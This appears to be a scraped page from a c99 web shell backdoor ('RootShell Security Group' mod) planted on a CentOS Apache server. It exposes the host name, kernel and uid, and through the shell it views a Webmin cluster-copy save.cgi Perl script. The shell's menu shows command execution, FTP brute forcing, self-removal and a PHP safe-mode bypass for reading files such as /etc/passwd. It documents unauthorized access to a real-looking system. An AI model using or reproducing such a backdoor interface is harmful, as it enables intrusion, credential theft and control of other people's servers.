!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/cluster-copy/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save.cgi (2.1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Save, delete or create a scheduled copy

require './cluster-copy-lib.pl';
&error_setup($text{'save_err'});
&ReadParse();

if (!$in{'new'}) {
    $copy = &get_copy($in{'id'});
    $job = &find_cron_job($copy);
    }

if ($in{'run'}) {
    # Run the job now
    &redirect("exec.cgi?id=$in{'id'}");
    exit;
    }
elsif ($in{'delete'}) {
    # Just delete it
    &delete_copy($copy);
    if ($job) {
        &lock_file(&cron::cron_file($job));
        &cron::delete_cron_job($job);
        &unlock_file(&cron::cron_file($job));
        }
    }
else {
    # Check and parse inputs
    $in{'files'} =~ s/\r//g;
    @files = split(/\n/, $in{'files'});
    foreach $f (@files) {
        $f =~ /^\// || &error(&text('save_efile', $f));
        }
    $copy->{'files'} = join("\t", @files);
    @files || &error($text{'save_efiles'});
    $in{'dest'} =~ /^\// || &error($text{'save_edest'});
    if ($in{'email_def'}) {
        $copy->{'email'} = '';
        }
    else {
        $in{'email'} =~ /^\S+$/ || &error($text{'save_eemail'});
        $copy->{'email'} = $in{'email'};
        }
    $copy->{'dest'} = $in{'dest'};
    $copy->{'dmode'} = $in{'dmode'};
    $copy->{'before'} = $in{'before'};
    $copy->{'cmd'} = $in{'cmd'};
    $copy->{'beforelocal'} = !$in{'beforeremote'};
    $copy->{'cmdlocal'} = !$in{'cmdremote'};
    @servers = split(/\0/, $in{'servers'});
    @servers || &error($text{'save_eservers'});
    $copy->{'servers'} = join(" ", @servers);
    $copy->{'sched'} = $in{'sched'};
    &cron::parse_times_input($copy, \%in);

    # Save or create
    &save_copy($copy);
    if ($job) {
        &lock_file(&cron::cron_file($job));
        &cron::delete_cron_job($job);
        }
    if ($in{'sched'}) {
        &cron::create_wrapper($cron_cmd, $module_name, "copy.pl");
        $job = { 'user' => 'root',
             'command' => "$cron_cmd $copy->{'id'}",
             'active' => 1,
             'mins' => $copy->{'mins'},
             'hours' => $copy->{'hours'},
             'days' => $copy->{'days'},
             'months' => $copy->{'months'},
             'weekdays' => $copy->{'weekdays'},
             'special' => $copy->{'special'} };
        &lock_file(&cron::cron_file($job));
        &cron::create_cron_job($job);
        }
    &unlock_file(&cron::cron_file($job)) if ($job);
    }
&webmin_log($in{'new'} ? 'create' : $in{'delete'} ? 'delete' : 'modify',
        'copy', undef, $copy);
&redirect("");

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0128 ]--